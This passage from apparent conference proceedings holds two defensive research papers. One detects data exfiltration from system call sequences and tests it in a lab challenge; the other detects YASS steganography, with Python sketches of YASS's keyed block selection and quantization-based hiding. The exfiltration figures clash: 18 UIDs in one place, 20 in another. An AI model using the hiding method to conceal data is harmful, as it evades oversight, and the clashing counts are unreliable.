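profile = NormalProfile()
profile.train([["open", "read", "close"], ["read", "fstat", "write"]])
```

Any sequence absent from the set is flagged as anomalous; richer scoring (e.g., counting misses over a<br />
window) can be layered on top of this membership test.<br />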

Previous research (Forrest, 2008) on host-based IDSs that has attempted to use system call<br />

sequences to detect anomalous behaviors has concentrated on detecting anomalies in program<br />

execution. That is, the analysis focused on individual processes and their execution, and did not<br />

take into account the uniqueness of each individual user.<br />

By contrast, when attempting to detect data exfiltrations, we are more interested in the behavior<br />

specific to a user. However, in order to create a normal profile that is specific to a user, it must be<br />

established that system call sequences are suitable for discriminating normal and anomalous<br />

behaviors in such a context.<br />

Given that, experientially, user behavior seems to vary drastically depending on the task being<br />

performed at any given moment, it is necessary to support the claim that unique system call<br />

sequences for a user can be generalized.<br />

We performed an experiment in which the unique system call sequences for individual users were<br />

tracked. The results of this experiment are illustrated in Figure 1. We define a stable profile as one<br />

that plateaus at a given size (N sequences). It is the asymptotic nature of the curve that makes<br />

anomaly detection possible.<br />

That is, in a given trace, the number of sequences generated can always be observed to "step" or to<br />

plateau under normal usage and to increase suddenly when a user performs a new or unusual action.<br />

Figure 1 demonstrates that, despite varying operations by users, a normal profile can be established<br />

and characterized by a tractable (< 200) number of unique system call sequences.<br />

Figure 1: Number of unique system call sequences for a given user/process versus the total number<br />

of system calls<br />

3.2 Models for system call sequences<br />

For our testing we implemented three different simple methods for enumerating system calls. The first<br />

of these methods is implemented very similarly to stide (Warrender, 1999). The method uses a sliding<br />

window of size N across all system calls included in a trace to form the sequences. However, we have<br />

adapted the method to incorporate UID/process name pairs to create a profile of our trace data.<br />
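A sketch of this windowed collection keyed by UID/process-name pairs follows; the record layout<br />
(uid, execname, syscall) is an assumption for illustration, not the paper's actual data format.<br />

```python
from collections import defaultdict

def window_profiles(events, n=6):
    """Slide a length-n window over the call stream of each
    (uid, execname) pair, collecting the unique sequences seen.
    'events' is an iterable of (uid, execname, syscall) records."""
    streams = defaultdict(list)
    for uid, execname, call in events:
        streams[(uid, execname)].append(call)
    profiles = {}
    for key, calls in streams.items():
        profiles[key] = {tuple(calls[i:i + n])
                         for i in range(len(calls) - n + 1)}
    return profiles

# Toy stream for a single 1/java pair, windowed with n=3.
events = [(1, "java", c) for c in
          ["open", "read", "fstat", "fstat", "write", "close", "mmap"]]
profiles = window_profiles(events, n=3)
```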

We also wanted to take care in choosing an appropriate value of N to be used with our<br />

implementation. The best value for N that is used for stide and similar implementations is discussed in<br />

a number of previous works. Kosoresow et al. (Kosoresow, 1997) suggest “the best sequence length<br />

to use would be 6 or slightly higher than 6,” and Kymie and Maxion (2002), in a paper dedicated to the singular question<br />

of “Why 6?”, provide empirical evidence supporting this conjecture.<br />

However, while evaluating our own variable sequence length method we identify another possible and<br />

more fundamental reason to pick a sequence size of 6. In Figure 2 we see the number of unique<br />

sequences present in a complete “normal” profile generated by our variable length sequence collector<br />

over one week.<br />

It is interesting to note the dramatic decrease in the number of sequences that occur with a length<br />

greater than 6. As the value of N increases we increase the accuracy of the profile generated<br />

proportionately to the percentage of system call sequences that fall under that size. However, we also<br />

increase our learning time and profile complexity by the same proportions. Therefore, for our<br />

experiments we also use 6 for the length of our sequences.<br />

The next model is designed to avoid the apparent shortcomings of the windowing method. Many<br />

sequences of length 1 or 2 repeat continuously, so fitting them with the fixed-length<br />

windowing method incurs substantial unnecessary overhead. This is also demonstrated in Figure 2.<br />

This leads us to theorize that a method utilizing a variable window length would perform better than<br />

the previous methods.<br />

While developing an approach to create variable sequences of system calls it was important to<br />

preserve the low run time complexity of the sliding window method while attempting to better model<br />

normal behavior. Thus, a simple solution was chosen. In order to construct our variable sequences we<br />

chose a subset such that sequence length is maximized while no one system call is repeated. This is<br />

implemented by constructing a sequence as calls are being traced and beginning a new sequence<br />

when a call is found to be a repeat in the current sequence.<br />
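This construction amounts to a single pass over the trace; a sketch (naming is ours):<br />

```python
def variable_sequences(trace):
    """Split a call trace into maximal sequences in which no system
    call repeats: a repeated call ends the current sequence and
    starts a new one."""
    sequences, current, seen = [], [], set()
    for call in trace:
        if call in seen:            # repeat found: close the sequence
            sequences.append(tuple(current))
            current, seen = [], set()
        current.append(call)
        seen.add(call)
    if current:                     # flush the trailing sequence
        sequences.append(tuple(current))
    return sequences

seqs = variable_sequences(
    ["open", "read", "fstat", "fstat", "write", "close", "mmap"])
```

For this trace the splitter yields two sequences, breaking at the repeated fstat.<br />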

Figure 2: Number of unique sequences observed with the size N (x-axis)<br />

Up to this point we have ignored the additional information about each system call when building our normal<br />

profile. Thus, we implement a third method that additionally uses errno and function arguments in<br />

matching sequences.<br />

The method uses the same methodology as the variable length sequences. Unique system call<br />

sequences are selected in such a way that length is maximized while no one system call is repeated<br />

in a given sequence. However, here we define a system call as {probefunc, errno, args}.<br />
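Since only the identity test changes, the same splitting logic works once each call is represented as<br />
the richer tuple; a hedged sketch (the field values below are invented for illustration):<br />

```python
def variable_sequences_with_args(calls):
    """Variable-length splitting where each call is a
    (probefunc, errno, args) tuple, so the same function invoked
    with different arguments counts as a different call."""
    sequences, current, seen = [], [], set()
    for call in calls:
        if call in seen:            # exact tuple repeat -> split
            sequences.append(tuple(current))
            current, seen = [], set()
        current.append(call)
        seen.add(call)
    if current:
        sequences.append(tuple(current))
    return sequences

calls = [("open", 0, "/etc/hosts"), ("read", 0, ""),
         ("open", 0, "/etc/hosts")]   # exact repeat of the first call
split = variable_sequences_with_args(calls)
```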

3.3 Comparison and discussion<br />

To validate our methods we tested them against each other. In Figure 3 we show the increase in<br />

number of sequences generated over one week of collection for a given UID/execname pair. From<br />

Figure 3 we can observe that the variable sequence length method both finishes training a normal<br />

profile faster and uses fewer sequences than either of the other methods, as hoped. This is likely in<br />

part due to the observation that the majority of sequences have a length less than 6, and the shorter<br />

the sequence, the more often it repeats (refer back to Figure 2).<br />

Another observation from Figure 3 is that the variable-with-arguments method reaches a<br />

stable state faster than the windowing method, and without an unacceptably large increase in the<br />

number of unique sequences. Again, this is most likely due to the better fitting of high frequency<br />

sequences.<br />

The surprise is how poorly the windowing method performs at generating a stable profile. It performs<br />

well over short runs, but when the testing is stretched over the period of a week it fails to show the<br />

same level of stabilization as the other two methods. Thus, for our purposes the variable method<br />

seems superior; the addition of arguments requires a much larger database, which correlates with<br />

many more false positives. Since detection speed and precision are what we are interested in, we use<br />

the variable method for the remainder of our testing.<br />

Figure 3: Three sequence collection methods (SEQ - windowing, VAR - variable, VARARG - variable<br />

with arguments) compared by number of unique sequences generated<br />

4. Evaluation<br />
We now evaluate the method prescribed in the previous section against our three criteria for our ideal<br />

exfiltration detection agent.<br />

4.1 Tractable<br />

Perhaps the largest singular challenge encountered during the implementation of this project is the<br />

task of collecting and managing the torrent of system calls that occur during normal to heavy use of a<br />

modern computer. Each user or process action can result in hundreds of system calls and in our own<br />

experiments logging system call activity alone generates a gigabyte of data per hour. In previous work<br />

(Kang, 2005; Forrest, 2008) this problem is sidestepped mainly by concentrating on individual<br />

processes/users/calls and/or using previously collected data.<br />

Unlike prior efforts, we are interested in tracing all system calls across multiple users to track their<br />

behavior in real time, and we also desire to deploy a swift analysis of that data without noticeably<br />

degrading system performance or destabilizing the system. While researching options for this we<br />

found an existing commercial solution that meets all of our needs.<br />

DTrace (Dtrace, 2009) is a software tool designed specifically for low-impact system call tracing<br />

for system administration and debugging. More importantly, it can be configured to collect the<br />

required system call data (timestamps, user and process identifiers, executable names, error<br />

numbers, and executable arguments) with negligible effect on system performance.<br />
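Collector output printed one record per call can then be post-processed by a small parser. The<br />
whitespace-separated field layout assumed below is for illustration only, not DTrace's native format:<br />

```python
def parse_record(line):
    """Parse one collector record of the assumed form
    '<timestamp> <uid> <pid> <execname> <probefunc> <errno>'."""
    ts, uid, pid, execname, probefunc, errno = line.split()
    return {"timestamp": int(ts), "uid": int(uid), "pid": int(pid),
            "execname": execname, "probefunc": probefunc,
            "errno": int(errno)}

# A single hypothetical record for the 501/java pair.
rec = parse_record("1277000000 501 4242 java open 0")
```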

Another challenge is the management of the collected data. Retaining and cataloging all the system<br />

calls for analysis at a later time is impractical given the observed data rate of over 1 gigabyte per<br />

hour. As we previously discussed, by collecting just the unique sequences that form our profile of<br />

normal behavior in real time we elegantly address this problem.<br />

Figure 1 shows the increase in the number of unique system call sequences for the 1/java pair in an hour-long<br />

system call set using our variable sequence model. This pair was chosen because of the volume of<br />

system calls it produces while the program actually performs only a few functions<br />

repeatedly. Of the approximately 1.4 million system calls generated by 1/java contained in<br />

the trace, only 196 unique sequences were recorded. It is this quick stabilization and small normal<br />

profile that combine with the advantages of Dtrace to make our implementation light-weight with very<br />

low observable impact on system performance.<br />

4.2 Environmentally neutral<br />

In order to validate that we can distinguish the normal profile of one user/process from another<br />

regardless of environmental conditions such as the operating system or other operational conditions,<br />

we must first explore the “diversity hypothesis” similar to that put forth by Forrest et al. in (Forrest<br />

2008). Their hypothesis states that the code paths executed by a process are highly reliant upon the<br />

usage patterns of the users, configuration, and environment hence causing what is considered to be<br />

normal to differ widely from one installation to the next.<br />

While our sequence-creation methods are similar to those of Forrest et al., theirs focus solely on<br />

program execution; the same diversity should theoretically still exist between the profiles generated by<br />

our methods when per-user patterns are added as a controlling factor. In addition, it may also be<br />

possible to determine the degree of impact changes such as different operating systems and varying<br />

users have upon a normal profile. We can observe this in our own testing by comparing the various<br />

collected profiles from different users and operating systems.<br />

Table 1: Comparison of normal profiles generated by different users by platform<br />

            User 1B       Linux (User 1)   Solaris (User 1)<br />

User 1A     0.91129591    0.16700353       0.19755409<br />

User 1B     1             0.14119998       0.13764726<br />

User 2      0.25793254    0.13287113       0.12885861<br />

User 3     0.30644131    0.17470944       0.20602069<br />

For this testing we had 3 different users (User 1A, User 2, and User 3 in Table 1) run our variable<br />

sequence collection algorithm for approximately 1 hour. All users were using Mac OSX on separate<br />

machines. In addition, we had User 1 repeat the same collection process on a separate date using<br />

Linux and Solaris operating systems on different machines, trying to keep behavior as similar as<br />

possible.<br />

The most significant result is that profiles from User 1A and User 1B have a >90% match while<br />

profiles generated by the other two users did not exceed a 31% match when compared to User 1. This seems<br />

to confirm that there is significant variation between the profiles of different users.<br />
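The paper does not spell out the match metric behind Table 1; one plausible choice, consistent with<br />
the asymmetric values shown there, is the directional overlap of sequence sets (a sketch, not the<br />
authors' definition):<br />

```python
def profile_match(a, b):
    """Fraction of profile a's unique sequences that also appear in
    profile b. Asymmetric: profile_match(a, b) != profile_match(b, a)
    in general, matching the asymmetry visible in Table 1."""
    a, b = set(a), set(b)
    return len(a & b) / len(a) if a else 0.0

# Toy profiles: every sequence in 'linux' also occurs in 'osx'.
osx = {("open", "read"), ("read", "close"), ("stat", "open"), ("mmap",)}
linux = {("open", "read"), ("read", "close")}
forward = profile_match(linux, osx)
backward = profile_match(osx, linux)
```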

Perhaps the disappointment here is that correlation between User 1A and User 1B profiles wasn't<br />

closer to 100%. However, it should be noted that most of the difference between these 2 sets was the<br />

use of a new process in the User 1B profile that wasn't present in the User 1A profile. This type of<br />

anomaly will have to be taken care of in any future implementation.<br />

Differences in profiles among various users are expectedly severe, with the most significant<br />

differences coming from different host operating systems. This is perhaps unsurprising since many of<br />

the system calls that are used by Mac OSX aren't used by Linux and vice versa. The same goes for<br />

Solaris vs. the others as well.<br />

However, this does validate that any model will have to be highly adaptable to the environment and<br />

not rely on a predetermined set of signature detection algorithms. This property does however help us<br />

greatly as mimicry attacks will be extremely difficult to carry out without specific knowledge of the<br />

environment and user's behaviors.<br />

4.3 Responsive<br />

The last of the criteria for evaluating our chosen implementation is the ability to detect a very large<br />

variety of data exfiltrations. For this stage of testing we issued a challenge that was conducted over<br />

the course of 2 days at Oak Ridge National Laboratory (ORNL) during the summer of 2010.<br />

Participants were solicited from the lab to exfiltrate a number of files set up on one of our testing<br />

machines. All participants were asked to exfiltrate 3 files:<br />

A plain text file plainly labeled in a directory and to which all participants had unrestricted access.<br />

A mock transactional database containing simulated sensitive personal financial information that<br />

was hidden within a shared location on the same machine.<br />

A document that was clearly labeled and had a known location but in a user directory with<br />

restricted access.<br />

While this data set will have a number of other uses in the future, it currently gives a good view of<br />

whether it will be feasible to detect attacks in progress and give an idea of what those attacks might<br />

look like. We had originally hoped that our attacks would display some specific similarities to each<br />

other, perhaps manifesting as an increase in certain system call types or some other type of pattern.<br />

However, we found that all of our attacks differed significantly with a wide variety of tactics deployed.<br />

Even those attacks that appeared to use the same tactics of exfiltration displayed very dissimilar<br />

system call sequence profiles.<br />

Overall there were 18 individual UIDs and over 9 gigabytes of alerts observed during the 2-day<br />

period. The size of the dataset collected, in contrast to the approximately 2<br />

megabytes of alerts generated under normal operation over the same time period, is evidence that our<br />

method is sufficiently sensitive to data exfiltration activities.<br />

Among the 20 observed UIDs, 8 are identifiable as successfully retrieving at least one of the files, and<br />

at least 2 retrieving all three. Observed behaviors included probing with find, privilege escalation<br />

attempts, mass data exfiltrations using the sftp protocol, and transferring the files to a USB flash drive.<br />

The detection of many of these attacks may in some sense be biased given that the attackers were new users<br />

on the system using a distinct UID. However, several of the attacks were observed among both the<br />

root account and the primary users’ UIDs, lending credibility to the system's ability to detect exfiltration<br />

behaviors even when the activity is hidden amongst normal system operation and users. As for the<br />

other attacks that were identified, each of these incidents invoked an alarm as designed, and for our<br />

immediate purposes serve to validate that the implementation is working as intended.<br />

5. Conclusions<br />

The accurate detection of malicious data exfiltration is a complex task that can take human experts<br />

months. However, in order to react to an attack, a practical system must not only detect attacks<br />

autonomously, but do so in real time before files can be leaked.<br />

The goal of this paper was to identify and test ways to approach this problem. We initially identified<br />

the main issues that separate our requirements from previous work<br />

on HIDSs. We sought a method that would be tractable enough to run in real time, environmentally neutral so as<br />

to perform well under any operating system or conditions, and, most importantly, responsive to behaviors<br />

specific to data exfiltrations. With these criteria in mind we adapted a means of host-based detection<br />

using sequences of system calls to implement a data exfiltration detection agent.<br />

In all of our testing, we have found that data exfiltration behaviors can be successfully detected by the<br />

relatively simple means of real-time system call sequence analysis, which can be implemented with<br />

negligible performance impact on user operations. Our adaptation of system call sequence monitoring<br />

to this specific problem is promising and passed our three main evaluation criteria. The<br />

implementation was successfully run in real-time and deployed across a diverse set of systems and<br />

users. We were also able to present evidence that our method detects a wide range of exfiltration<br />

related behaviors.<br />

This work has prompted the question of whether this approach can detect these malicious behaviors<br />

quickly and accurately enough to prevent the data exfiltration. Our future work will focus on correlating<br />

suspicious behaviors to more reliably discriminate malicious behaviors, and further testing of our<br />

methods against known attacks is warranted to determine long-term performance.<br />

Acknowledgements<br />

The views and conclusions contained in this document are those of the authors. This manuscript has<br />

been authored by UT-Battelle, LLC, under contract DE-AC05-00OR22725 with the U.S. Department<br />

of Energy. The United States Government retains and the publisher, by accepting the article for<br />

publication, acknowledges that the United States Government retains a non-exclusive, paid-up,<br />

irrevocable, world-wide license to publish or reproduce the published form of this manuscript, or allow<br />

others to do so, for United States Government purposes.<br />

References<br />

Axelsson, S. (2000) “The Base-Rate Fallacy and the Difficulty of Intrusion Detection.” ACM Transactions on<br />

Information and System Security, Vol. 3 No. 3, pp. 186-205.<br />

Cohen, W.W. (1995) Fast effective rule induction. In Machine Learning: the 12th International <strong>Conference</strong>.<br />

Morgan Kaufmann.<br />

Coleman, K.G. (2008) “Data Exfiltration.” [online], http://it.tmcnet.com/topics/it/articles/37876-data-exfiltration.htm.<br />

Dtrace (2009), [online], http://www.oracle.com/technetwork/systems/dtrace/dtrace/index.html.<br />

Endler, D. (1998) Intrusion detection: applying machine learning to Solaris audit data. In Proc. of the IEEE<br />

Annual Computer Security Applications <strong>Conference</strong>, pages 268–279. Society Press.<br />

Fidelis Security Systems, (2009) “Fidelis Extrusion Prevention System”. [online], http://www.fidelissecurity.com/.<br />

Forrest, S. et al. (1996) A sense of self for UNIX processes. In Proceedings of the 1996 IEEE Symposium on<br />

Security and Privacy, pages 120–128, Los Alamitos, CA, IEEE Computer Society Press.<br />

Forrest, S. et al. (2008) “The Evolution of System-call Monitoring”, 2008 Annual Computer Security Applications<br />

<strong>Conference</strong>.<br />

Gao, D. et al (2006) Behavioral distance measurement using hidden markov models. In D. Zamboni and C.<br />

Kruegel, editors, Research Advances in Intrusion Detection, LNCS 4219, pages 19–40, Berlin Heidelberg,<br />

Springer-Verlag.<br />

Ghosh, A. and Schwartzbard, A. (1999) A study in using neural networks for anomaly and misuse detection. In<br />

Proceedings of the 8th USENIX Security Symposium.<br />

Giani, A. et al. (2004) “Data Exfiltration and Covert Channels.” In Proceedings of the SPIE 2004 Defense and<br />

Security Symposium.<br />

Hooper, E. (2009) “Intelligent Strategies for Secure Complex Systems Integration and Design, Effective Risk<br />

Management and Privacy.” In Proceedings of the 3rd Annual IEEE International Systems <strong>Conference</strong>.<br />

Kang, D. et al. (2005) “Learning Classifiers for Misuse and Anomaly Detection Using a Bag of System Calls<br />

Representation”, Proceedings of the 2005 Workshop on Information Assurance and Security, 2005.<br />

Kosoresow, A.P. and Hofmeyr, S.A. (1997) Intrusion detection via system call traces. IEEE Software, 14(5):35–<br />

42.<br />

Kymie, M.C.T. and Maxion, R. (2002) “‘Why 6?’ Defining the Operational Limits of stide, an Anomaly-Based<br />

Intrusion Detector.”<br />

Lee, W. et al. (1997) Learning patterns from UNIX process execution traces for intrusion detection. In AAAI<br />

Workshop on AI Approaches to Fraud Detection and Risk Management, pages 50–56. AAAI Press.<br />

Lee, W. and Stolfo, S.J. (1998) Data mining approaches for intrusion detection. In Proceedings of the 7th<br />

USENIX Security Symposium.<br />

Liao, Y. and Vemuri, V.R. (2002) Use of k-nearest neighbor classifier for intrusion detection. Computers &<br />

Security, 21(5):439–448.<br />

Liu, Y. et al. (2009) “SIDD: A Framework for Detecting Sensitive Data Exfiltration by an Insider Attack.” In<br />

Proceedings of the 42nd Hawaii International <strong>Conference</strong> on System Sciences, 2009.<br />

McAfee (2003), [online], http://www.mcafee.com/us/.<br />

Richardson, R. (2007) CSI Computer Crime and Security Survey, [online],<br />

http://icmpnet.com/v2.gocsi.com/pdf/CSISurvey2007.pdf.<br />

SANS Institute (2010) “20 Critical Security Controls, Critical Control 15: Data Loss Prevention.” [online],<br />

http://www.sans.org/critical-security-controls/control.php?id=15<br />

Warrender, C. et al (1999) "Detecting Intrusions Using System Calls: Alternative Data Models." In 1999 IEEE<br />

Symposium on Security and Privacy.<br />



Detection of YASS Using Calibration by Motion Estimation<br />

Kesav Kancherla and Srinivas Mukkamala<br />

(ICASA) / (Canes) / New Mexico Institute of Mining and Technology USA<br />

kancherla@cs.nmt.edu<br />

srinivas@cs.nmt.edu<br />

Abstract: In this paper we propose a new approach that addresses the shortcomings of current blind steganalysis<br />

methods. “Yet Another Steganographic Scheme” (YASS) is a robust steganographic scheme that embeds data at<br />

random locations based on a secret key. Due to this randomization, current steganalysis schemes such as<br />

self-calibration methods fail to detect YASS. In this work, we present a new calibration method that uses motion<br />

estimation and extracts higher-order features. In our methodology, a motion estimation technique is applied to an<br />

image to obtain an estimate of it. We assume that, due to spatial redundancy in images, the estimated image<br />

captures the features of the actual image. We extract two sets of features, DCT-based features from the DCT<br />

domain and Markov-model-based features from the spatial domain, and apply Support Vector Machines (SVMs) to<br />

these feature sets. Our approach, tested against YASS with different block sizes (9, 10, 12, and 14), compression<br />

rates (50/50, 50/75, and 75/75) and numbers of coefficients used for embedding data (12 and 19), obtained an<br />

accuracy of about 95%, even for larger block sizes and low embedding rates. This methodology can be used as a<br />

blind steganalysis technique, as detection is based on the modification of an image rather than on a particular<br />

steganographic scheme.<br />

Keywords: blind steganalysis, Discrete Cosine Transform (DCT), motion estimation, steganalysis, Support<br />

Vector Machines (SVM)<br />

1. Introduction<br />

Steganography is the science of embedding data in a cover object for covert communication. The rapid<br />

growth of the internet and digital media has increased the threat of steganography being used for covert<br />

communication. Steganographic images are not perceptible to the human eye, but embedding data in an<br />

image changes its statistics. The goal of a steganalyst is to use these statistical changes to detect the<br />

presence of a hidden message.<br />

Fridrich used second-order statistics in her self-calibration method for blind steganalysis<br />

(Fridrich, 2004: 67-81). In the self-calibration technique, a given image is first decompressed and a few<br />

rows and columns are cropped. The cropped image is recompressed using the same quality factor,<br />

and the difference between the features extracted from the actual image and the cropped image is used<br />

to detect steganograms. To detect well-known steganographic schemes like Outguess, F5 and Model-Based<br />

Steganography (Provos, 2001: 24; Westfeld, 2001: 289-302; Sallee, 2005: 167-190), Farid<br />

proposed the use of wavelet-based features for JPEG steganalysis (Lyu and Farid, 2002: 340-354),<br />

Shi proposed the use of a transition matrix as features for detecting steganograms (Shi et al, 2006: 249-<br />

264), Fridrich used merged Discrete Cosine Transform (DCT) and Markov features to implement<br />

multi-class JPEG steganalysis (Pevny and Fridrich, 2007: 1-13), and Chen proposed<br />

Markov-based features using the intra-block and inter-block correlation of DCT coefficients (Chen and<br />

Shi, 2008: 3029-3032).<br />

Outguess embeds data by replacing least significant bits and preserves the first-order statistics by<br />

performing additional changes; the F5 algorithm uses matrix embedding to reduce the number of changes<br />

needed to embed data; and Model-Based Steganography tries to preserve the histograms of individual<br />

AC DCT modes after embedding the data. Current steganalysis techniques can detect<br />

these steganography methods. “Yet Another Steganography Scheme” (YASS) by (Solanki, Sarkar<br />

and Manjunath, 2007: 16-31) is a newer steganography scheme that resists the above steganalysis<br />

methods. YASS embeds data at random locations and uses Quantization Index Modulation (QIM) to<br />

increase the robustness of the data. Even though YASS cannot be detected using current self-calibration<br />

methods, embedding data still changes the statistical properties of the image.<br />

In (Li, Shi and Huang, 2008: 139-148), the authors present a targeted attack on YASS. They showed<br />

that due to the QIM embedding scheme used in YASS, there is an increase in the number of zero DCT<br />

coefficients in the stego image; thus there is a notable difference between the statistics of an embedded<br />

block and an unmodified block. They also showed that the embedding locations are not random enough<br />

to prevent detection of YASS. However, this approach does not work when the algorithm is modified. In the<br />

method proposed by (Kodovský, Pevný and Fridrich, 2010: 1-11), the authors used various well-known<br />

steganalysis methods for the detection of YASS: the Subtractive Pixel Adjacency Model (SPAM)<br />

feature set (686 features), the Pevný feature set (584 features), the Markov Process (MP) feature<br />

set (486 features) and the CDF (Cross-Domain Feature) set (1,234 features, a combination of SPAM and<br />

Pevný). Except for SPAM, these features are extracted from the DCT domain (Pevny and Fridrich,<br />

2007: 1-13; Chen and Shi, 2008: 3029-3032; Pevny, Bas and Fridrich, 2009: 75-84). In the Pevný feature<br />

set, Cartesian calibration is used instead of difference calibration, which increases the feature<br />

set length; the authors argue that the use of difference calibration affects the performance of<br />

detection. Our approach in this paper is based on difference calibration for detection.<br />

In this paper we propose a novel method that uses calibration for detection. YASS defeats current<br />

calibration methods by embedding data at random locations. In our approach, we perform calibration<br />

by estimating the image using motion estimation. Motion estimation is widely used in video compression<br />

to capture temporal redundancies; in our case we use motion estimation on adjacent blocks to<br />

capture spatial redundancies. After obtaining the estimated image we extract two sets of features:<br />

DCT-based features and Markov-based features (Pevny and Fridrich, 2007: 1-13). The Markov-based<br />

features are extracted from the spatial domain rather than the DCT domain, as the embedding is done in<br />

the spatial domain. We used a Support Vector Machine (SVM) based classifier in our experiments, and<br />

obtained an accuracy of about 95% even for low embedding rates. This paper is organized as follows:<br />

section 2 briefly discusses the YASS algorithm, section 3 outlines our approach, section 4 gives a brief<br />

overview of the features used, and section 5 presents the results obtained, followed by the conclusion in<br />

section 6.<br />

2. YASS algorithm<br />

For an input image of size MxN, the following steps are involved in YASS (Solanki, Sarkar and<br />

Manjunath, 2007: 16-31):<br />

1. The input image is divided into blocks of size BxB (B > 8, the JPEG block size), called big-blocks.<br />

Compressed images such as JPEG are first decompressed and then divided.<br />

2. In each big-block, a block of size 8x8 is pseudo-randomly selected. This block is called the embedding<br />

block. The key for the random number generator is shared between the sender and receiver.<br />

3. A two-dimensional DCT is applied to each embedding block and the DCT coefficients are divided by the<br />

quantization matrix of the design quality factor QFh. Data is embedded into a predetermined band of<br />

low-frequency AC coefficients using quantization index modulation.<br />

4. After embedding the data, the embedding block is de-quantized using the design quality factor and the<br />

inverse two-dimensional DCT is applied.<br />

5. After data is embedded in all the embedding blocks, the image is compressed with the advertised<br />

quality factor QFa. Generally QFh is not less than QFa.<br />
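The keyed block-selection and QIM steps above can be sketched as follows. This is a minimal illustration, not the authors' implementation: the function names are ours, NumPy's RandomState stands in for the shared key generator, and QIM is reduced to a toy even/odd quantizer on a single coefficient.<br />

```python
import numpy as np

def select_embedding_blocks(height, width, B, key):
    """Steps 1-2 of YASS (sketch): partition the image into BxB big-blocks
    and pseudo-randomly pick one 8x8 embedding block inside each,
    seeded by the shared secret key."""
    rng = np.random.RandomState(key)           # sender and receiver share `key`
    blocks = []
    for top in range(0, height - B + 1, B):
        for left in range(0, width - B + 1, B):
            dy = rng.randint(0, B - 8 + 1)     # offset of the 8x8 block
            dx = rng.randint(0, B - 8 + 1)     # inside this big-block
            blocks.append((top + dy, left + dx))
    return blocks

def qim_embed(coeff, bit, step=2.0):
    """Toy quantization index modulation: move the DCT coefficient to the
    nearest even (bit 0) or odd (bit 1) point of a lattice of width step/2."""
    q = np.round(coeff / step) * 2             # even lattice index
    if bit:
        q += 1                                 # shift to the odd lattice
    return q * step / 2
```

Because the receiver knows the key, re-running `select_embedding_blocks` with the same arguments reproduces the same block positions; a steganalyst without the key cannot resynchronize to them.<br />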

The random selection of embedding blocks in step 2 ensures security against current<br />

calibration-based steganalysis methods: as data is embedded in randomly located 8x8 blocks, the<br />

steganalyst cannot resynchronize by cropping rows and columns. However, the scheme reduces the<br />

embedding capacity. Even so, embedding data at random locations still changes the statistical<br />

properties of the DCT coefficients.<br />

Our approach tries to capture these changes by obtaining an estimated image from the actual image<br />

using spatial redundancies. This estimation process is similar to the motion estimation widely used<br />

in video compression techniques. After finding the estimate, we model the difference between the<br />

actual and estimated images along the horizontal, vertical, and diagonal directions as a one-step<br />

Markov process. We extract DCT and Markov features from the actual and estimated images. After<br />

modeling and extracting features, we train an SVM-based classifier to detect steganograms.<br />

3. Our approach<br />

The steganalysis scheme consists of three steps: (1) obtain the estimated image from the actual image, (2)<br />

extract high-order DCT and Markov features from both the actual and the estimated image, and (3) train an<br />

SVM classifier using these features. In order to obtain the estimated image we use the concept of motion<br />

estimation (Torr and Zisserman, 1999: 278-294), which is widely used in video compression techniques.<br />

Motion estimation exploits temporal redundancies in videos to achieve compression.<br />

The video compression process consists of inter-frame compression and intra-frame compression.<br />

Intra-frame compression is similar to JPEG compression, while inter-frame compression uses the temporal<br />

redundancy between video frames: the current frame is predicted using redundant data from the previous<br />

frame. The current frame is divided into 8x8 blocks and a match for each block is found in the previous<br />

frame by searching in the near vicinity of the block being analyzed.<br />

Figure 1: The current block is matched against candidates in the search space and replaced by its best match<br />

We apply this concept to images in order to find the estimate. Just as videos contain temporal<br />

redundancies, images contain spatial redundancies. We find the best estimate of the current block in its<br />

vicinity and replace the block with this match. Figure 1 shows the matching procedure, where the best<br />

match is found in the search space. To reduce the noise induced by motion estimation, we used a block<br />

size of 4x4.<br />

The algorithm for estimating the image is given below:<br />

1. De-compress the image by applying de-quantization and the inverse two-dimensional DCT<br />

2. Divide the decompressed image into blocks of size 4x4<br />

3. For each 4x4 block, find the best match at a step size of 1 pixel along both the x-axis and the y-axis<br />

4. Replace the actual block with the best match<br />

5. After obtaining the matched blocks, apply the two-dimensional DCT and quantization to the estimated image<br />

6. From this image, extract two sets of features: DCT-based and Markov-model-based features<br />
4. Feature extraction<br />

In this section we briefly explain the feature extraction. We extract the merged DCT and Markov<br />

features (Pevny and Fridrich, 2007: 1-13) that are used for blind steganalysis. The first set of<br />

features consists of DCT-based features extracted from 23 different functions. These 23 functions<br />

are based on first-order and higher-order statistics of the quantized DCT coefficients. The second set<br />

of features is extracted from Markov-based models: the differences between absolute values of<br />

neighboring pixel coefficients are modeled as a Markov process, from which we extract co-occurrence<br />

matrices. Due to the high dimensionality of these functions, only features at selected locations and for<br />

selected values are taken. We extract a total of 274 features, of which 193 are DCT-based features<br />

and 81 are Markov-based features. The major difference between (Pevny and Fridrich, 2007: 1-13)<br />

and our features is that instead of extracting the Markov-based features in the DCT domain, we extract<br />

them in the spatial domain only. As the embedding is done in the spatial domain, we believe Markov<br />

features extracted there are effective. A brief description of both sets of features is given below.<br />

4.1 DCT features<br />

The coefficients are denoted d_ij(k), i, j = 1, …, 8, k = 1, …, n_b, where d_ij(k) denotes the (i, j)-th quantized<br />

DCT coefficient in the k-th block (there are n_b blocks in total).<br />

The first set of features is the histogram of the DCT coefficients of the image. To reduce dimensionality<br />

we use only the histogram of the values from -5 to 5.<br />

The next 5 functions are the histograms of the coefficients of 5 individual DCT modes (i, j) ∈ {(1, 2), (2, 1),<br />

(3, 1), (2, 2), (1, 3)}, where again only the histogram of the values {-5, …, 5} is used:<br />

h^{ij} = (h^{ij}_L, …, h^{ij}_R) (1)<br />

The next 11 functions are dual histograms, represented by 8 x 8 matrices g^d_{ij}, where i, j = 1, …, 8 and<br />

d = -5, …, 5:<br />

g^d_{ij} = Σ_{k=1}^{n_B} δ(d, d_ij(k)) (2)<br />

where δ(x, y) = 1 if x = y and 0 otherwise. To reduce the number of features, only (i, j) ∈ {(2, 1), (3, 1), (4, 1),<br />

(1, 2), (2, 2), (3, 2), (1, 3), (2, 3), (1, 4)} are taken.<br />
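A sketch of these first feature groups, the global coefficient histogram and the dual histograms of equation (2), operating on an array of quantized DCT coefficients of shape (n_blocks, 8, 8); the function names are ours:<br />

```python
import numpy as np

# The nine low-frequency modes kept for the dual histograms, 1-based (i, j).
MODES = ((2, 1), (3, 1), (4, 1), (1, 2), (2, 2), (3, 2), (1, 3), (2, 3), (1, 4))

def global_histogram(dct_blocks, lo=-5, hi=5):
    """Normalized histogram of all quantized DCT coefficients,
    restricted to the values lo..hi (11 features)."""
    vals = dct_blocks.ravel()
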